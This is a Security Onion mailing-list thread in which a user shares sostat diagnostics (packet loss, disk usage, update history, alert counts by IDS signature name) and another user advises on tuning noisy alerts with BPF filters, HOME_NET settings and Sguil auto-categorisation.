File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +160493 Lost: -150432
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +171957 Lost: -208898
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154579 Lost: -37074
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +200343 Lost: -15445
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +161059 Lost: -170284
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +116291 Lost: -55688
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +144739 Lost: -29414
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +119307 Lost: -8220
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +217198 Lost: -266748
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +119169 Lost: -1233
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +186692 Lost: -36804
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +159937 Lost: -166349
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154573 Lost: -12746
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +146880 Lost: -170568
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +156046 Lost: -99220
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +131688 Lost: -30925
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +149258 Lost: -41035
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +170429 Lost: -95190
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +148444 Lost: -69031
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154177 Lost: -7813
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +184301 Lost: -72774
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +163189 Lost: -116529
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +157240 Lost: -168891
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +155869 Lost: -70119
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +152651 Lost: -38884
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +147671 Lost: -68387
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +159191 Lost: -279033
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154387 Lost: -156815
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +148401 Lost: -34349
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +156319 Lost: -42639
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +151356 Lost: -135694
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154847 Lost: -171976
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +152676 Lost: -34167
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154880 Lost: -6362
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +160433 Lost: -144546
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +161637 Lost: -213360
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +158114 Lost: -18337
=========================================================================
PF_RING
=========================================================================
PF_RING Version : 6.4.1 (unknown)
Total rings : 2
Standard (non ZC) Options
Ring slots : 4096
Slot version : 16
Capture TX : Yes [RX+TX]
IP Defragment : No
Socket Mode : Standard
Total plugins : 0
Cluster Fragment Queue : 0
Cluster Fragment Discard : 0
=========================================================================
Log Archive
=========================================================================
/nsm/sensor_data/SO-server-eth0/dailylogs/ - 0 days
4.0K .
/nsm/sensor_data/SO-server-eth1/dailylogs/ - 1 days
30G .
30G ./2016-08-14
/nsm/bro/logs/ - 1 days
516K .
260K ./2016-08-14
252K ./stats
=========================================================================
Sguil Uncategorized Events
=========================================================================
COUNT(*)
432801
=========================================================================
Sguil events summary for yesterday
=========================================================================
Total
0
=========================================================================
Top 50 All time Sguil Events
=========================================================================
Totals GenID:SigID Signature
340570 1:2012088 ET SHELLCODE Possible Call with No Offset TCP Shellcode
317031 1:2100651 GPL SHELLCODE x86 stealth NOOP
61 1:2000419 ET POLICY PE EXE or DLL Windows file download
41 1:2014939 ET POLICY DNS Query for TOR Hidden Domain .SO-server Accessible Via TOR
4 1:2021874 ET TROJAN Linux/dtool IRC Command (UDPFLOOD)
4 1:2021873 ET TROJAN Linux/dtool IRC Command (TCPFLOOD)
4 1:2021872 ET TROJAN Linux/dtool IRC Command (HTTPFLOOD)
3 1:2000418 ET POLICY Executable and linking format (ELF) file download
2 1:2021915 ET TROJAN ELF/muBoT IRC Activity 4
2 1:2013028 ET POLICY curl User-Agent Outbound
2 1:2021879 ET TROJAN Linux/dtool IRC Command (STOP)
Total
657725
=========================================================================
Last update
=========================================================================
Start-Date: 2016-08-01 16:35:24
Commandline: apt-get -y dist-upgrade
Upgrade: securitySO-server-suricata:amd64 (3.0.1-1ubuntu1securitySO-server1, 3.1.1-1ubuntu1securitySO-server1), kpartx:amd64 (0.4.9-3ubuntu7.12, 0.4.9-3ubuntu7.13), mysql-client-core-5.5:amd64 (5.5.49-0ubuntu0.14.04.1, 5.5.50-0ubuntu0.14.04.1), securitySO-server-pfring-ld:amd64 (20120827-0ubuntu0securitySO-server9, 20120827-0ubuntu0securitySO-server10), isc-dhcp-common:amd64 (4.2.4-7ubuntu12.4, 4.2.4-7ubuntu12.5), dpkg:amd64 (1.17.5ubuntu5.6, 1.17.5ubuntu5.7), securitySO-server-capme:amd64 (20121213-0ubuntu0securitySO-server59, 20121213-0ubuntu0securitySO-server60), dkms:amd64 (X.X.X.X-1.1ubuntu5.14.04.5, X.X.X.X-1.1ubuntu5.14.04.7), libdrm-intel1:amd64 (2.4.64-1~ubuntu14.04.1, 2.4.67-1ubuntu0.14.04.1), libarchive13:amd64 (3.1.2-7ubuntu2.2, 3.1.2-7ubuntu2.3), gimp:amd64 (2.8.10-0ubuntu1, 2.8.10-0ubuntu1.1), dpkg-dev:amd64 (1.17.5ubuntu5.6, 1.17.5ubuntu5.7), libdrm-radeon1:amd64 (2.4.64-1~ubuntu14.04.1, 2.4.67-1ubuntu0.14.04.1), libgimp2.0:amd64 (2.8.10-0ubuntu1, 2.8.10-0ubuntu1.1), securitySO-server-nsmnow-admin-scripts:amd64 (20120724-0ubuntu0securitySO-server134, 20120724-0ubuntu0securitySO-server138), grub-common:amd64 (2.02~beta2-9ubuntu1.7, 2.02~beta2-9ubuntu1.11), libnspr4:amd64 (4.10.10-0ubuntu0.14.04.1, 4.12-0ubuntu0.14.04.1), libnss3-1d:amd64 (3.21-0ubuntu0.14.04.2, 3.23-0ubuntu0.14.04.1), base-files:amd64 (7.2ubuntu5.4, 7.2ubuntu5.5), curl:amd64 (7.35.0-1ubuntu2.6, 7.35.0-1ubuntu2.7), libimobiledevice4:amd64 (1.1.5+git20140313.bafe6a9e-0ubuntu1, 1.1.5+git20140313.bafe6a9e-0ubuntu1.1), libgd3:amd64 (2.1.0-3ubuntu0.1, 2.1.0-3ubuntu0.2), grub2-common:amd64 (2.02~beta2-9ubuntu1.7, 2.02~beta2-9ubuntu1.11), securitySO-server-daq:amd64 (2.0.6-0ubuntu0securitySO-server2, 2.0.6-0ubuntu0securitySO-server5), libldap-2.4-2:amd64 (2.4.31-1+nmu2ubuntu8.2, 2.4.31-1+nmu2ubuntu8.3), libnss3-nssdb:amd64 (3.21-0ubuntu0.14.04.2, 3.23-0ubuntu0.14.04.1), gimp-data:amd64 (2.8.10-0ubuntu1, 2.8.10-0ubuntu1.1), securitySO-server-web-page:amd64 (20141015-0ubuntu0securitySO-server57, 20141015-0ubuntu0securitySO-server60), xserver-xorg-core-lts-vivid:amd64 (1.17.1-0ubuntu3.1~trusty1, 1.17.1-0ubuntu3.1~trusty1.1), wget:amd64 (1.15-1ubuntu1.14.04.1, 1.15-1ubuntu1.14.04.2), libdpkg-perl:amd64 (1.17.5ubuntu5.6, 1.17.5ubuntu5.7), securitySO-server-snort:amd64 (X.X.X.X-1ubuntu1securitySO-server1, X.X.X.X-1ubuntu1securitySO-server1), securitySO-server-sostat:amd64 (20120722-0ubuntu0securitySO-server53, 20120722-0ubuntu0securitySO-server59), isc-dhcp-client:amd64 (4.2.4-7ubuntu12.4, 4.2.4-7ubuntu12.5), libnss3:amd64 (3.21-0ubuntu0.14.04.2, 3.23-0ubuntu0.14.04.1), libdrm-nouveau2:amd64 (2.4.64-1~ubuntu14.04.1, 2.4.67-1ubuntu0.14.04.1), libmysqlclient18:amd64 (5.5.49-0ubuntu0.14.04.1, 5.5.50-0ubuntu0.14.04.1), grub-pc-bin:amd64 (2.02~beta2-9ubuntu1.7, 2.02~beta2-9ubuntu1.11), apache2-data:amd64 (2.4.7-1ubuntu4.9, 2.4.7-1ubuntu4.13), grub-pc:amd64 (2.02~beta2-9ubuntu1.7, 2.02~beta2-9ubuntu1.11), sbsigntool:amd64 (0.6-0ubuntu7.1, 0.6-0ubuntu7.2), securitySO-server-pfring-daq:amd64 (20121107-0ubuntu0securitySO-server12, 20121107-0ubuntu0securitySO-server13), libcurl3:amd64 (7.35.0-1ubuntu2.6, 7.35.0-1ubuntu2.7), kpartx-boot:amd64 (0.4.9-3ubuntu7.12, 0.4.9-3ubuntu7.13), securitySO-server-setup:amd64 (20120912-0ubuntu0securitySO-server215, 20120912-0ubuntu0securitySO-server224), securitySO-server-pfring-userland:amd64 (20160204-1ubuntu1securitySO-server2, 20160708-1ubuntu1securitySO-server1), libexpat1:amd64 (2.1.0-4ubuntu1.2, 2.1.0-4ubuntu1.3), apache2:amd64 (2.4.7-1ubuntu4.9, 2.4.7-1ubuntu4.13), tzdata:amd64 (2016d-0ubuntu0.14.04, 2016f-0ubuntu0.14.04), apache2-bin:amd64 (2.4.7-1ubuntu4.9, 2.4.7-1ubuntu4.13), linux-libc-dev:amd64 (3.13.0-87.133, 3.13.0-92.139), libdrm2:amd64 (2.4.64-1~ubuntu14.04.1, 2.4.67-1ubuntu0.14.04.1), libxrandr2:amd64 (1.4.2-1, 1.5.0-1~trusty1), libcurl3-gnutls:amd64 (7.35.0-1ubuntu2.6, 7.35.0-1ubuntu2.7)
End-Date: 2016-08-01 16:47:18
Start-Date: 2016-08-14 03:33:26
Commandline: apt-get install open-vm-tools
Install: open-vm-tools:amd64 (9.4.0-1280544-5ubuntu6.2), zerofree:amd64 (1.0.2-1ubuntu1, automatic)
End-Date: 2016-08-14 03:33:56
=========================================================================
ELSA
=========================================================================
Syslog-ng
Checking for process:
1600 /usr/sbin/syslog-ng -p /var/run/syslog-ng.pid
Checking for connection:
Connection to localhost 514 port [tcp/shell] succeeded!
MySQL
Checking for process:
1606 /usr/sbin/mysqld
Checking for connection:
Connection to localhost 3306 port [tcp/mysql] succeeded!
Sphinx
Checking for process:
1513 su -s /bin/sh -c exec "$0" "$@" sphinxsearch -- /usr/bin/searchd --nodetach
1598 /usr/bin/searchd --nodetach
Checking for connection:
Connection to localhost 9306 port [tcp/*] succeeded!
ELSA Buffers in Queue:
3
If this number is consistently higher than 20, please see:
https://github.com/Security-Onion-Solutions/security-SO-server/wiki/FAQ#why-does-sostat-show-a-high-number-of-elsa-buffers-in-queue
ELSA Directory Sizes:
438M /nsm/elsa/data
2.3M /var/lib/mysql/syslog
32K /var/lib/mysql/syslog_data
ELSA Index Date Range
If you don't have at least 2 full days of logs in the Index Date Range,
then you'll need to increase log_size_limit in /etc/elsa_node.conf.
MIN(start) MAX(end)
2016-08-14 03:21:41 2016-08-14 18:40:52
robbie@onion:~$ cd /etc/nsm/rules
robbie@onion:/etc/nsm/rules$ ls
app-layer-events.rules bro downloaded.rules local.rules smtp-events.rules tls-events.rules
backup classification.config files.rules modbus-events.rules so_rules.rules white_list.rules
black_list.rules decoder-events.rules gen-msg.map reference.config stream-events.rules
bpf.conf dns-events.rules http-events.rules sid-msg.map threshold.conf
robbie@onion:/etc/nsm/rules$
Wes
Aug 14, 2016, 3:14:27 PM8/14/16
to security-onion
Robbie,
Specifically, what application is crashing? Your RAM seems to be okay from your sostat -- are you referring to disk space?
Also, have you seen the following (in regard to managing alerts)?
https://github.com/Security-Onion-Solutions/security-onion/wiki/ManagingAlerts
You can add specific IPs or ranges to HOME_NET (or other variables) in /etc/nsm/HOSTNAME-INTERFACE/snort.conf if you do not wish for Snort to alert on them.
You could also look at BPF if you would like to complete exclude certain traffic from being collected:
https://github.com/Security-Onion-Solutions/security-onion/wiki/BPF
Last, you could create an Autocat rule in Sguil to assist with auto-categorizing various alerts.
https://github.com/Security-Onion-Solutions/security-onion/wiki/ManagingAlerts#autocategorize-events
I would be careful to not let the uncategorized Sguil events get too high, as this could potentially lead to poor performance and/or DB table corruption for securityonion_db (Sguil DB).
Hope this helps.
Thanks,
Wes
Robbie Foster
Aug 16, 2016, 12:43:35 AM8/16/16
to security-onion
Wes
Aug 16, 2016, 7:26:52 AM8/16/16
to security-onion
Have you considered telling it what traffic (not alerts) to cut out by using BPF for the time being, then pruning back once you get other alerting mechanisms better tuned?
https://github.com/Security-Onion-Solutions/security-onion/wiki/BPF
Also, if you are performing full packet capture and monitoring a lot of traffic, you may run out of space very quickly I would consider attaching a larger drive for /nsm if this is the case--otherwise, you could try disabling FPC for now.
https://github.com/Security-Onion-Solutions/security-onion/wiki/Hardware#storage
https://github.com/Security-Onion-Solutions/security-onion/wiki/NewDisk
Thanks,
Wes
Robbie Foster
Aug 17, 2016, 7:54:20 PM8/17/16
to security-onion
I used BPF and all of the undesired events stopped. Is there any benefit or detrimental effect of using BPF over white_list or is one as good a solution as the next. I am not getting any activity now which is what I would expect to see since I am the only one who has access to the VM box. I am going to let it run over night before I start thinking about pairing back resources allocated to it now.
Thanks for the help with this!
Thanks for the help with this!
Wes
Aug 17, 2016, 8:14:42 PM8/17/16
to security-onion
On Wednesday, August 17, 2016 at 7:54:20 PM UTC-4, Robbie Foster wrote:
> I used BPF and all of the undesired events stopped. Is there any benefit or detrimental effect of using BPF over white_list or is one as good a solution as the next. I am not getting any activity now which is what I would expect to see since I am the only one who has access to the VM box. I am going to let it run over night before I start thinking about pairing back resources allocated to it now.
> Thanks for the help with this!
> I used BPF and all of the undesired events stopped. Is there any benefit or detrimental effect of using BPF over white_list or is one as good a solution as the next. I am not getting any activity now which is what I would expect to see since I am the only one who has access to the VM box. I am going to let it run over night before I start thinking about pairing back resources allocated to it now.
> Thanks for the help with this!
I would imagine the use of BPF would only be "detrimental" if you needed to be able to see any of the traffic you were ignoring. If the intention is to ignore all traffic from a specific range or from certain hosts to other hosts and you have no need to see any of the traffic in any manner, then BPF should be fine.
Even so, BPF has the capability to do a decent amount of filtering on its own. While not comparable to the added depth provided by Snort/Suricata's mechanisms, it seems they are meant for achieving different goals.
Thanks,
Wes
Reply all
Reply to author
Forward
0 new messages